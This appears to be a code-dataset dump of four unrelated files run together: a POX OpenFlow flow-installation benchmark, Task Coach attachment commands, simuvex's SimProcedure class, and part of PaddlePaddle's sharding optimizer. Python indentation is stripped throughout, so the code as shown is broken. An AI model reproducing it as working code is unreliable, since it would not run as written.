# Switch we'll be adding L2 learning switch capabilities to
self.connection = connection
self.transparent = transparent
# Our table
self.macToPort = {}
# We want to hear PacketIn messages, so we listen
# to the connection
connection.addListeners(self)
# We just use this to know when to log a helpful message
self.hold_down_expired = _flood_delay == 0
#-----------------------
msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
# iterate over all connected switches and delete all their flows
connection.send(msg)
print "INFO: Clearing all flows..."
#for BCM switch only
msg = of.ofp_flow_mod()
msg.priority = 1000
msg.match.dl_type = 0x800
msg.match.in_port = 5
msg.match.nw_src = '10.0.0.1'
msg.idle_timeout = 3000
msg.hard_timeout = 3000
#msg.actions.append(of.ofp_action_output(port = 1))
self.connection.send(msg)
print 'INFO: add a default rule... (BCM only)'
#-------------------------
# (note that flow_mods match all flows by default)
os.system('./simplesniffer eth2&')
os.system('sudo bash ../pktgen/pktgen.conf.1-1-flow-dist.sh &')
time.sleep(5)
y = 0
print 'INFO: starting sending flow mod...'
for k in xrange(1,769):#the number of rules to install
#insert first
msg = of.ofp_flow_mod()
#msg.match = of.ofp_match.from_packet(packet, event.port)
#msg.priority = 20000 + randrange(1000)
msg.priority = 2000
msg.match.dl_type = 0x800
i = int(k / 256) + 56
j = k % 256
dst = '192.168.' + str(i) + '.' + str(j)
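# e.g. k=1 -> 192.168.56.1, k=256 -> 192.168.57.0, k=768 -> 192.168.59.0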
#msg.match.in_port = 1
#msg.match.nw_src = '10.0.0.1'
msg.match.nw_dst = dst
#print 'INFO',dst, time.time()
msg.idle_timeout = 1600
msg.hard_timeout = 1600
msg.actions.append(of.ofp_action_output(port = 1))
#msg.data = event.ofp # 6a
self.connection.send(msg)
#print 'DATA: 10.0.0.1', dst, '%f' %time.time()
#print 'DATA: 10.0.0.1', dst, '%f' %time.time()
burst[dst] = time.time()
if k % 50 == 0:
self.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
#if k == 40:
# self.connection.send(of.ofp_stats_request(body=of.ofp_port_stats_request()))
# if k == 80:
# self.connection.send(of.ofp_stats_request(body=of.ofp_queue_stats_request()))
time.sleep(interval)
print 'INFO: flow mod measure finished...'
#write file
w = open('poxout1','w')
for d in burst:
w.write('src: 10.0.0.1 dst: %s sec: %f usec: %f\n' %(d, int(burst[d]), (burst[d] - int(burst[d])) * 1000000 ))
w.close()
os.system('sudo bash cleanpox.sh') # self destroy
def _handle_PacketIn (self, event):
"""
Handle packet in messages from the switch to implement above algorithm.
"""
packet = event.parsed
#print 'PACKET_IN:', event.port, packet.next.dstip,'%f' % time.time()
def _handle_flowstats_received (event):
stats = flow_stats_to_list(event.stats)
print "FlowStatsReceived from %s: %s" % (dpidToStr(event.connection.dpid), stats)
class l2_learning (object):
"""
Waits for OpenFlow switches to connect and makes them learning switches.
"""
def __init__ (self, transparent):
core.openflow.addListeners(self)
self.transparent = transparent
def _handle_ConnectionUp (self, event):
log.debug("Connection %s" % (event.connection,))
LearningSwitch(event.connection, self.transparent)
def launch (transparent=False, hold_down=_flood_delay):
"""
Starts an L2 learning switch.
"""
try:
global _flood_delay
_flood_delay = int(str(hold_down), 10)
assert _flood_delay >= 0
except:
raise RuntimeError("Expected hold-down to be a number")
core.registerNew(l2_learning, str_to_bool(transparent))
| apache-2.0 |
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/command/attachmentCommands.py | 1 | 5021 | # -*- coding: utf-8 -*-
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2013 Task Coach developers <developers@taskcoach.org>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from taskcoachlib import patterns
from taskcoachlib.i18n import _
from taskcoachlib.domain import attachment
import base, noteCommands
class EditAttachmentLocationCommand(base.BaseCommand):
plural_name = _('Edit location of attachments')
singular_name = _('Edit attachment "%s" location')
def __init__(self, *args, **kwargs):
self.__newLocation = kwargs.pop('newValue')
super(EditAttachmentLocationCommand, self).__init__(*args, **kwargs)
self.__oldLocations = [item.location() for item in self.items]
@patterns.eventSource
def do_command(self, event=None):
super(EditAttachmentLocationCommand, self).do_command()
for item in self.items:
item.setLocation(self.__newLocation)
@patterns.eventSource
def undo_command(self, event=None):
super(EditAttachmentLocationCommand, self).undo_command()
for item, oldLocation in zip(self.items, self.__oldLocations):
item.setLocation(oldLocation)
def redo_command(self):
self.do_command()
class AddAttachmentCommand(base.BaseCommand):
plural_name = _('Add attachment')
singular_name = _('Add attachment to "%s"')
def __init__(self, *args, **kwargs):
self.owners = []
self.__attachments = kwargs.get('attachments',
[attachment.FileAttachment('', subject=_('New attachment'))])
super(AddAttachmentCommand, self).__init__(*args, **kwargs)
self.owners = self.items
self.items = self.__attachments
self.save_modification_datetimes()
def modified_items(self):
return self.owners
@patterns.eventSource
def addAttachments(self, event=None):
kwargs = dict(event=event)
for owner in self.owners:
owner.addAttachments(*self.__attachments, **kwargs) # pylint: disable=W0142
@patterns.eventSource
def removeAttachments(self, event=None):
kwargs = dict(event=event)
for owner in self.owners:
owner.removeAttachments(*self.__attachments, **kwargs) # pylint: disable=W0142
def do_command(self):
super(AddAttachmentCommand, self).do_command()
self.addAttachments()
def undo_command(self):
super(AddAttachmentCommand, self).undo_command()
self.removeAttachments()
def redo_command(self):
super(AddAttachmentCommand, self).redo_command()
self.addAttachments()
class RemoveAttachmentCommand(base.BaseCommand):
plural_name = _('Remove attachment')
singular_name = _('Remove attachment to "%s"')
def __init__(self, *args, **kwargs):
self._attachments = kwargs.pop('attachments')
super(RemoveAttachmentCommand, self).__init__(*args, **kwargs)
@patterns.eventSource
def addAttachments(self, event=None):
kwargs = dict(event=event)
for item in self.items:
item.addAttachments(*self._attachments, **kwargs) # pylint: disable=W0142
@patterns.eventSource
def removeAttachments(self, event=None):
kwargs = dict(event=event)
for item in self.items:
item.removeAttachments(*self._attachments, **kwargs) # pylint: disable=W0142
def do_command(self):
super(RemoveAttachmentCommand, self).do_command()
self.removeAttachments()
def undo_command(self):
super(RemoveAttachmentCommand, self).undo_command()
self.addAttachments()
def redo_command(self):
super(RemoveAttachmentCommand, self).redo_command()
self.removeAttachments()
class CutAttachmentCommand(base.CutCommandMixin, RemoveAttachmentCommand):
def itemsToCut(self):
return self._attachments
def sourceOfItemsToCut(self):
class Wrapper(object):
def __init__(self, items):
self.__items = items
def extend(self, attachments):
for item in self.__items:
item.addAttachments(*attachments)
def removeItems(self, attachments):
for item in self.__items:
item.removeAttachments(*attachments)
return Wrapper(self.items)
| gpl-3.0 |
zhuyue1314/simuvex | simuvex/s_procedure.py | 1 | 9027 | #!/usr/bin/env python
import inspect
import itertools
import logging
l = logging.getLogger(name = "simuvex.s_procedure")
symbolic_count = itertools.count()
from .s_run import SimRun
from .s_cc import DefaultCC
class SimProcedure(SimRun):
ADDS_EXITS = False
NO_RET = False
local_vars = ()
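# ADDS_EXITS: subclasses that add their own (non-return) successors set this to True.
# NO_RET: subclasses modeling procedures that never return set this to True.
# local_vars: attribute names saved/restored across call()/SimProcedureContinuation.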
def __init__(self, state, ret_to=None, stmt_from=None, convention=None, arguments=None, sim_kwargs=None, run_func_name='run', **kwargs):
self.kwargs = { } if sim_kwargs is None else sim_kwargs
SimRun.__init__(self, state, **kwargs)
self.state.scratch.bbl_addr = self.addr
self.stmt_from = -1 if stmt_from is None else stmt_from
self.arguments = arguments
self.ret_to = ret_to
self.ret_expr = None
self.symbolic_return = False
self.state.scratch.sim_procedure = self.__class__.__name__
self.run_func_name = run_func_name
# types
self.argument_types = { } # a dictionary of index-to-type (i.e., type of arg 0: SimTypeString())
self.return_type = None
# calling convention
self.cc = None
self.set_convention(convention)
# prepare and run!
if o.AUTO_REFS not in self.state.options:
cleanup_options = True
self.state.options.add(o.AST_DEPS)
self.state.options.add(o.AUTO_REFS)
else:
cleanup_options = False
run_spec = inspect.getargspec(self.run)
num_args = len(run_spec.args) - (len(run_spec.defaults) if run_spec.defaults is not None else 0) - 1
args = [ self.arg(_) for _ in xrange(num_args) ]
run_func = getattr(self, run_func_name)
r = run_func(*args, **self.kwargs)
if r is not None:
self.ret(r)
if o.FRESHNESS_ANALYSIS in self.state.options:
self.state.scratch.update_ignored_variables()
if cleanup_options:
self.state.options.discard(o.AST_DEPS)
self.state.options.discard(o.AUTO_REFS)
def run(self, *args, **kwargs): #pylint:disable=unused-argument
raise SimProcedureError("%s does not implement a run() method" % self.__class__.__name__)
def reanalyze(self, new_state=None, addr=None, stmt_from=None, convention=None):
new_state = self.initial_state.copy() if new_state is None else new_state
addr = self.addr if addr is None else addr
stmt_from = self.stmt_from if stmt_from is None else stmt_from
cc = self.cc if convention is None else convention
return self.__class__(new_state, addr=addr, stmt_from=stmt_from, convention=cc, sim_kwargs=self.kwargs) #pylint:disable=E1124,E1123
def initialize_run(self):
pass
def handle_run(self):
self.handle_procedure()
def handle_procedure(self):
raise Exception("SimProcedure.handle_procedure() has been called. This should have been overwritten in class %s.", self.__class__)
def set_convention(self, convention=None):
if convention is None:
# default conventions
if self.state.arch.name in DefaultCC:
self.cc = DefaultCC[self.state.arch.name](self.state.arch)
else:
raise SimProcedureError(('There is no default calling convention for architecture %s.'
' You must specify a calling convention.') % self.state.arch.name)
else:
self.cc = convention
def set_args(self, args):
self.cc.set_args(self.state, args)
# Returns a bitvector expression representing the nth argument of a function
def arg(self, index):
if self.arguments is not None:
r = self.arguments[index]
else:
r = self.cc.arg(self.state, index)
l.debug("returning argument")
return r
def inline_call(self, procedure, *arguments, **sim_kwargs):
e_args = [ self.state.BVV(a, self.state.arch.bits) if isinstance(a, (int, long)) else a for a in arguments ]
p = procedure(self.state, inline=True, arguments=e_args, sim_kwargs=sim_kwargs)
return p
# Sets an expression as the return value. Also updates state.
def set_return_expr(self, expr):
if isinstance(expr, (int, long)):
expr = self.state.BVV(expr, self.state.arch.bits)
if o.SIMPLIFY_RETS in self.state.options:
l.debug("... simplifying")
l.debug("... before: %s", expr)
expr = self.state.se.simplify(expr)
l.debug("... after: %s", expr)
if self.symbolic_return:
size = len(expr)
new_expr = self.state.se.Unconstrained("multiwrite_" + self.__class__.__name__, size) #pylint:disable=maybe-no-member
self.state.add_constraints(new_expr == expr)
expr = new_expr
if self.arguments is not None:
self.ret_expr = expr
return
else:
self.cc.set_return_expr(self.state, expr)
# Adds an exit representing the function returning. Modifies the state.
def ret(self, expr=None):
if expr is not None: self.set_return_expr(expr)
if self.arguments is not None:
l.debug("Returning without setting exits due to 'internal' call.")
return
elif self.ret_to is not None:
self.state.log.add_action(SimActionExit(self.state, self.ret_to))
self.add_successor(self.state, self.ret_to, self.state.se.true, 'Ijk_Ret')
else:
if self.cleanup:
self.state.options.discard(o.AST_DEPS)
self.state.options.discard(o.AUTO_REFS)
ret_irsb = self.state.arch.disassemble_vex(self.state.arch.ret_instruction, mem_addr=self.addr)
ret_simirsb = SimIRSB(self.state, ret_irsb, inline=True, addr=self.addr)
if not ret_simirsb.flat_successors + ret_simirsb.unsat_successors:
ret_state = ret_simirsb.default_exit
else:
ret_state = (ret_simirsb.flat_successors + ret_simirsb.unsat_successors)[0]
if self.cleanup:
self.state.options.add(o.AST_DEPS)
self.state.options.add(o.AUTO_REFS)
self.add_successor(ret_state, ret_state.scratch.target, ret_state.scratch.guard, ret_state.scratch.jumpkind)
def call(self, addr, args, continue_at, cc=None):
if cc is None:
cc = self.cc
call_state = self.state.copy()
ret_addr = self.state.BVV(self.state.procedure_data.hook_addr, self.state.arch.bits)
saved_local_vars = zip(self.local_vars, map(lambda name: getattr(self, name), self.local_vars))
simcallstack_entry = (self.__class__, continue_at, cc.stack_space(self.state, args), saved_local_vars, self.kwargs)
cc.setup_callsite(call_state, ret_addr, args)
call_state.procedure_data.callstack.append(simcallstack_entry)
if call_state.libc.ppc64_abiv == 'ppc64_1':
call_state.regs.r2 = self.state.mem[addr + 8:].long.resolved
addr = call_state.mem[addr:].long.resolved
elif call_state.arch.name in ('MIPS32', 'MIPS64'):
call_state.regs.t9 = addr
self.add_successor(call_state, addr, call_state.se.true, 'Ijk_Call')
if o.DO_RET_EMULATION in self.state.options:
ret_state = self.state.copy()
cc.setup_callsite(ret_state, ret_addr, args)
ret_state.procedure_data.callstack.append(simcallstack_entry)
guard = ret_state.se.true if o.TRUE_RET_EMULATION_GUARD in ret_state.options else ret_state.se.false
self.add_successor(ret_state, ret_addr, guard, 'Ijk_FakeRet')
def jump(self, addr):
self.add_successor(self.state, addr, self.state.se.true, 'Ijk_Boring')
def ty_ptr(self, ty):
return SimTypePointer(self.state.arch, ty)
def __repr__(self):
if self._custom_name is not None:
return "<SimProcedure %s>" % self._custom_name
else:
return "<SimProcedure %s>" % self.__class__.__name__
class SimProcedureContinuation(SimProcedure):
def __new__(cls, state, *args, **kwargs):
# pylint: disable=bad-super-call
if len(state.procedure_data.callstack) == 0:
raise SimProcedureError("Tried to run simproc continuation with empty stack")
newstate = state.copy()
cls, continue_at, stack_space, saved_local_vars, saved_kwargs = newstate.procedure_data.callstack.pop()
newstate.regs.sp += stack_space
self = object.__new__(cls)
for name, val in saved_local_vars:
setattr(self, name, val)
kwargs['sim_kwargs'] = saved_kwargs
self.__init__(newstate, *args, run_func_name=continue_at, **kwargs)
return self
from . import s_options as o
from .s_errors import SimProcedureError
from .vex.irsb import SimIRSB
from .s_type import SimTypePointer
from .s_action import SimActionExit
| bsd-2-clause |
luotao1/Paddle | python/paddle/distributed/fleet/meta_optimizers/sharding_optimizer.py | 1 | 65621 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
from paddle.fluid import unique_name, core
import paddle.fluid as fluid
from paddle.distributed.fleet.meta_optimizers.common import OpRole, OP_ROLE_VAR_KEY, CollectiveHelper
from paddle.distributed.fleet.meta_optimizers.common import is_backward_op, is_optimizer_op, is_update_op
from paddle.distributed.fleet.meta_optimizers.meta_optimizer_base import MetaOptimizerBase
from paddle.distributed.fleet.meta_optimizers.sharding.shard import Shard, ProgramSegment
from paddle.distributed.fleet.meta_optimizers.sharding.fp16_helper import FP16Utils
from paddle.distributed.fleet.meta_optimizers.sharding.weight_decay_helper import WeightDecayHelper
from paddle.distributed.fleet.meta_optimizers.sharding.gradient_clip_helper import GradientClipHelper
from .sharding.offload_helper import OffloadHelper
from paddle.distributed.fleet.meta_optimizers.sharding.prune import ProgramDeps
from paddle.distributed.fleet.meta_optimizers.sharding.utils import *
from paddle.fluid.framework import Program, Variable, name_scope, default_main_program, default_startup_program, device_guard
from paddle.fluid import layers
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
from functools import reduce
__all__ = ["ShardingOptimizer"]
class ShardingOptimizer(MetaOptimizerBase):
"""Sharding Optimizer."""
def __init__(self, optimizer):
super(ShardingOptimizer, self).__init__(optimizer)
self.inner_opt = optimizer
self.meta_optimizers_white_list = [
"RecomputeOptimizer",
"AMPOptimizer",
"LarsOptimizer",
"LambOptimizer",
# "ModelParallelOptimizer",
# "PipelineOptimizer",
]
self.meta_optimizers_black_list = ["GraphExecutionOptimizer", ]
self._main_program = None
self._startup_program = None
self._segments = []
# params and fp16 params is for broadcast
self._params = set([])
self._broadcast_vars = set([])
# reduced grads to param name
self._reduced_grads_to_param = {}
self._shard = Shard()
self._verbose = False
# use sharding as outer parallelism (e.g. inner:Megatron & outer sharding)
self.mp_degree = 1
def _can_apply(self):
if not self.role_maker._is_collective:
return False
if self.role_maker._worker_num() <= 1:
return False
return self.user_defined_strategy.sharding
def _disable_strategy(self, dist_strategy):
dist_strategy.sharding = False
dist_strategy.sharding_configs = {}
def _enable_strategy(self, dist_strategy, context):
dist_strategy.sharding = True
dist_strategy.sharding_configs = {"segment_broadcast_MB": 32}
def minimize_impl(self,
loss,
startup_program=None,
parameter_list=None,
no_grad_set=None):
# TODO: (JZ-LIANG) support multiple comm in future
# self._nrings = self.user_defined_strategy.nccl_comm_num
self._nrings_sharding = 1
self._nrings_dp = 1
# segment
self._sharding_segment_strategy = str(
self.user_defined_strategy.sharding_configs[
"sharding_segment_strategy"])
if self._sharding_segment_strategy == "segment_broadcast_MB":
self._broadcast_MB = self.user_defined_strategy.sharding_configs[
"segment_broadcast_MB"]
assert self._broadcast_MB > 0, "segment size should larger than zero !"
elif self._sharding_segment_strategy == "segment_anchors":
self._sharding_segment_anchors = self.user_defined_strategy.sharding_configs[
"segment_anchors"]
assert len(self._sharding_segment_anchors
) > 0, "you should set the sharding segment anchors !"
self._backward_remain_anchors = self._sharding_segment_anchors[:]
self._forward_remain_anchors = []
else:
raise NotImplementedError(
"the sharding segment strategy [{}] is not implemented".format(
str(self._sharding_segment_strategy)))
# parallelism
self.sharding_degree = int(self.user_defined_strategy.sharding_configs[
"sharding_degree"])
assert self.sharding_degree > 0, "sharding degree must be larger than zero"
self.mp_degree = int(self.user_defined_strategy.sharding_configs[
"mp_degree"])
# pipeline setting
# TODO (JZ-LIANG) should revise here to support mixed parallelism with pipeline
self.pp_degree = int(self.user_defined_strategy.sharding_configs[
"pp_degree"])
if self.pp_degree > 1:
assert self.user_defined_strategy.pipeline == True
self.dp_degree = int(self.user_defined_strategy.sharding_configs[
'dp_degree'])
assert self.role_maker._worker_num(
) == self.mp_degree * self.sharding_degree * self.pp_degree * self.dp_degree, "global work size [{}], mp_degree [{}], sharding_degree [{}], pp_degree [{}], dp_degree [{}].".format(
self.role_maker._worker_num(),
self.mp_degree,
self.sharding_degree,
self.pp_degree,
self.dp_degree, )
# FIXME (JZ-LIANG) deprecated hybrid_dp
if self.user_defined_strategy.sharding_configs["hybrid_dp"]:
logging.warning(
"[hybrid_dp] API setting is deprecated. Now when dp_degree >= 2, its will be in hybrid dp mode automatically"
)
assert self.dp_degree >= 1
if self.dp_degree > 1:
self.hybrid_dp = True
else:
self.hybrid_dp = False
# NOTE (JZ-LIANG)
# there are 2 kinds of modes for gradient-merge and hybrid-dp in mixed parallelism: [sharding] and [pipeline].
# we distinguish these two modes since the gm/hybrid-dp related allreduce should be inserted in a different place for each mode to get the best performance:
# sharding: communication within a node, therefore inserted within the backward segment to overlap with bw calc, conducted every micro step
# pipeline: communication across nodes, therefore inserted in the update segment, conducted just once per global step
self.hybrid_dp_mode = None
# dp here is the pure dp as the outermost parallelism
if self.hybrid_dp:
assert self.dp_degree > 1, "hybrid dp is on, but dp degree is [{}]".format(
self.dp_degree)
if self.pp_degree > 1:
self.hybrid_dp_mode = "pp_hybrid_dp"
else:
assert self.sharding_degree > 1, "for now we only support five kinds of hybrid dp: sharding_hybrid_dp, mp_sharding_hybrid_dp, pp_hybrid_dp, mp_sharding_pp_hybrid_dp, sharding_pp_hybrid_dp."
self.hybrid_dp_mode = "sharding_hybrid_dp"
# gradient merge
self._gradient_merge_acc_step = int(
self.user_defined_strategy.sharding_configs[
"gradient_merge_acc_step"])
self.gradient_merge_mode = None
if self.pp_degree <= 1:
self.gradient_merge_mode = "sharding_gm"
self._grad2merged_grad = dict()
else:
self.gradient_merge_mode = "pp_gm"
self._gradient_merge_acc_step = self.user_defined_strategy.pipeline_configs[
'accumulate_steps']
if self._gradient_merge_acc_step > 1:
logging.info("Gradient merge in [{}], acc step = [{}]".format(
self.gradient_merge_mode, self._gradient_merge_acc_step))
# optimize offload
self.optimize_offload = self.user_defined_strategy.sharding_configs[
"optimize_offload"]
# this feature is designed for ascend, and should NOT be used in GPU training
self.pp_allreduce_in_optimize = self.user_defined_strategy.sharding_configs[
"pp_allreduce_in_optimize"]
if self.inner_opt is None:
raise ValueError(
"self.inner_opt of ShardingOptimizer should not be None.")
if self.pp_degree > 1:
pp_optimizer = fluid.optimizer.PipelineOptimizer(
self.inner_opt, self._gradient_merge_acc_step)
main_program = loss.block.program
main_program._pipeline_opt = dict()
self.schedule_mode = self.user_defined_strategy.pipeline_configs[
'schedule_mode']
main_program._pipeline_opt['schedule_mode'] = self.schedule_mode
main_program._pipeline_opt[
'micro_batch_size'] = self.user_defined_strategy.pipeline_configs[
'micro_batch_size']
self.pp_rank_ = self.role_maker._worker_index() // (
self.sharding_degree * self.mp_degree) % self.pp_degree
main_program._pipeline_opt['local_rank'] = self.pp_rank_
main_program._pipeline_opt[
'global_rank'] = self.role_maker._worker_index()
main_program._pipeline_opt['use_sharding'] = True
# TODO (JZ-LIANG) should revise here to support mixed parallelism with pipeline
main_program._pipeline_opt['ring_id'] = 20
main_program._pipeline_opt['global_ring_id'] = 3
optimize_ops, params_grads, program_list, self.pipeline_pair, self.pp_ring_map = pp_optimizer.minimize(
loss, startup_program, parameter_list, no_grad_set)
self.pp_degree = len(program_list)
else:
optimize_ops, params_grads = self.inner_opt.minimize(
loss, startup_program, parameter_list, no_grad_set)
if startup_program is None:
startup_program = default_startup_program()
if self.pp_degree > 1:
startup_program = startup_program._pipeline_opt['startup_program']
#main_program = main_program._pipeline_opt['section_program']['program']
print("pp_rank:", self.pp_rank_)
main_program = program_list[self.pp_rank_]
with open("main_%d" % self.role_maker._worker_index(), 'w') as f:
f.writelines(str(main_program))
main_block = main_program.global_block()
new_params_grads = []
for param, grad in params_grads:
if main_block.has_var(param.name):
new_params_grads.append((param, grad))
params_grads = new_params_grads
else:
main_block = loss.block
startup_block = startup_program.global_block()
self._main_program = main_block.program
self._startup_program = startup_program
if self.pp_degree > 1:
pp_optimizer._rename_gradient_var_name(main_block)
with open("main_%d" % self.role_maker._worker_index(), 'w') as f:
f.writelines(str(main_program))
# step0: _init_comm
self._init_comm()
if self.sharding_degree > 1:
# step1: build shard
self._build_shard(params_grads)
# step2: split_program
self._split_program(main_block)
# step3: add broadcast and reduce ops
self._add_broadcast_allreduce(main_block)
main_block._sync_with_cpp()
startup_block._sync_with_cpp()
main_block._sync_with_cpp()
# step4: remove unneeded ops and vars from block
self._prune_main_program(main_block)
self._prune_startup_program(startup_block)
if self.pp_degree > 1:
# sharding-pp related logic
# pp_optimizer._rename_gradient_var_name(main_block)
# crop ops
if self.sharding_degree > 1:
for idx, op in reversed(list(enumerate(main_block.ops))):
if is_update_op(op):
op_role_var = op.attr('op_role_var')
param_name = op_role_var[0]
if not self._shard.has_param(param_name):
main_block._remove_op(idx)
for idx, op in reversed(list(enumerate(main_block.ops))):
if op.type != 'cast': continue
in_name = op.input_arg_names[0]
if in_name not in self._params: continue
#if self._shard.has_param(param_name): continue
if in_name not in main_block.vars:
main_block._remove_op(idx)
accumulated_grad_names = pp_optimizer._accumulate_gradients(
main_block)
# accumulated_grad_names = sorted(accumulated_grad_names)
if self.pp_allreduce_in_optimize:
print("persistable FP32 grad: ")
print(accumulated_grad_names)
first_optimize_op_index = get_first_check_finite_and_unscale_op_idx(
main_block)
insert_reduce_ops(
main_block,
first_optimize_op_index,
self.sharding_ring_id,
accumulated_grad_names,
self._shard,
core.op_proto_and_checker_maker.OpRole.Optimize,
use_calc_stream=True)
if self.hybrid_dp and self.hybrid_dp_mode == "pp_hybrid_dp":
first_optimize_op_index = get_first_check_finite_and_unscale_op_idx(
main_block)
insert_allreduce_ops(
main_block,
first_optimize_op_index,
self.dp_ring_id,
accumulated_grad_names,
core.op_proto_and_checker_maker.OpRole.Optimize,
use_calc_stream=True)
# if sharding is not used, adapt amp/clip for the remaining parallelism.
# cast --> amp --> clip --> opt
if self.sharding_degree <= 1:
# amp
FP16Utils.sync_amp_check_nan_inf(main_block, self.global_ring_id)
# clip
gradientclip_helper = GradientClipHelper(self.global_ring_id)
gradientclip_helper.sync_global_norm(
main_block, self.global_ring_id, self.dp_degree)
# step6: loss div dp_degree
global_dp_degree = self.sharding_degree * self.dp_degree
assert int(global_dp_degree) == global_dp_degree
if global_dp_degree > 1:
insert_scale_loss_grad_ops(main_block, scale=1.0 / global_dp_degree)
main_block._sync_with_cpp()
# TODO(wangxi): add optimize offload
# opt offload should be enabled only when gradient merge is enabled && acc_step is quite large (e.g. >> 100),
# since its memcpy cannot be overlapped with calc; otherwise it will slow down training severely.
if self.optimize_offload:
logging.info("Sharding with optimize offload !")
offload_helper = OffloadHelper()
offload_helper.offload(main_block, startup_block)
offload_helper.offload_fp32param(main_block, startup_block)
# step6: (optional) sharding gradient merge
if self.gradient_merge_mode == "sharding_gm" and self._gradient_merge_acc_step > 1:
self._sharding_gradient_merge(main_block)
# # check op dependency
# FIXME (JZ-LIANG) enable checking in future.
# check_broadcast(main_block)
# check_allreduce_sum(main_block, self._shard, self.sharding_ring_id,
# self.dp_ring_id)
if self.hybrid_dp:
# NOTE(JZ-LIANG) ensure in both sharding_hybrid_dp & pp_hybrid_dp
# init param broadcast should be called after startup pruning
self._initialization_broadcast(startup_block)
with open("start_sharding_%d" % self.role_maker._worker_index(),
'w') as f:
f.writelines(str(startup_block.program))
with open("main_sharding_%d" % self.role_maker._worker_index(),
'w') as f:
f.writelines(str(main_block.program))
self._wait()
return optimize_ops, params_grads
def _init_comm(self):
# config sharding & dp groups
self._build_groups()
# sync var
startup_block = self._startup_program.global_block()
self.startup_prog_sync_var = startup_block.create_var(
name="startup_prog_sync_var",
shape=[1],
dtype=core.VarDesc.VarType.INT32,
persistable=False)
# global ring
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.global_endpoints,
self.global_rank,
self.global_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# mp ring
if self.mp_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.mp_group_endpoints,
self.mp_rank,
self.mp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# sharding ring
if self.sharding_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.sharding_group_endpoints,
self.sharding_rank,
self.sharding_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
# pp ring
if self.pp_degree > 1:
if self.schedule_mode == 'F-then-B': # GPipe
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.pp_group_endpoints,
self.pp_rank,
self.pp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.pp_group_endpoints,
self.pp_rank,
self.pp_ring_id + 2,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
else:
assert self.schedule_mode == '1F1B'
for pair in self.pipeline_pair:
pair_key = pair[0] * 1000 + pair[1]
ring_id = self.pp_ring_map[pair_key]
print("pp pair:{}, ring_id: {}".format(pair, ring_id))
if self.pp_rank not in pair: continue
pp_group_endpoints = [
self.pp_group_endpoints[pair[0]],
self.pp_group_endpoints[pair[1]],
]
if pair[0] < pair[1]:
start_ring_id = self.pp_ring_id + pair[1] - pair[0] - 1
else:
start_ring_id = self.pp_ring_id + 2 + pair[0] - pair[
1] - 1
pp_rank = 0 if self.pp_rank == pair[0] else 1
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
pp_group_endpoints,
pp_rank,
ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
# append_naive_sync(startup_block, self.startup_prog_sync_var,
# self.global_ring_id)
# TODO (JZ-LIANG) unify this logic
assert self.pp_rank_ == self.pp_rank, "pp rank for pp opt [{}], pp rank for sharding opt [{}]".format(
self.pp_rank_, self.pp_rank)
# pure dp ring
if self.dp_degree > 1:
self._collective_helper._init_communicator(
self._startup_program,
self.current_endpoint,
self.dp_group_endpoints,
self.dp_rank,
self.dp_ring_id,
False,
global_ring_id=self.global_ring_id,
sync=False)
append_naive_sync(startup_block, self.startup_prog_sync_var,
self.global_ring_id)
startup_block._sync_with_cpp()
def _build_shard(self, params_grads):
# step 2: split params
self._params = set([x[0].name for x in params_grads])
self._shard.setup(params_grads, self.sharding_rank,
self.sharding_degree)
# step 3: get broadcast vars
self._broadcast_vars = self._shard.find_broadcast_params(
self._main_program.global_block())
def _wait(self, ):
endpoints = self.global_endpoints[:]
current_endpoint = endpoints[self.global_rank]
if self.global_rank == 0:
self._collective_helper._wait(current_endpoint, endpoints)
def collect_segment(self, segment, op_idx, block):
segment._start_idx = op_idx + 1
self._segments.insert(0, segment)
new_segment = ProgramSegment(block)
new_segment._end_idx = op_idx + 1
return new_segment
def _split_program(self, block):
for op_idx, op in reversed(list(enumerate(block.ops))):
if int(op.attr('op_role')) != int(OpRole.Optimize):
last_backward_op_idx = op_idx + 1
break
var2broadcast_time = dict()
segment = ProgramSegment(block)
segment._end_idx = last_backward_op_idx
for op_idx in reversed(range(last_backward_op_idx)):
op = block.ops[op_idx]
assert (int(op.attr('op_role')) != int(OpRole.Optimize))
if self._sharding_segment_strategy == "segment_broadcast_MB":
if segment._param_mem >= self._broadcast_MB:
segment = self.collect_segment(segment, op_idx, block)
elif self._sharding_segment_strategy == "segment_anchors":
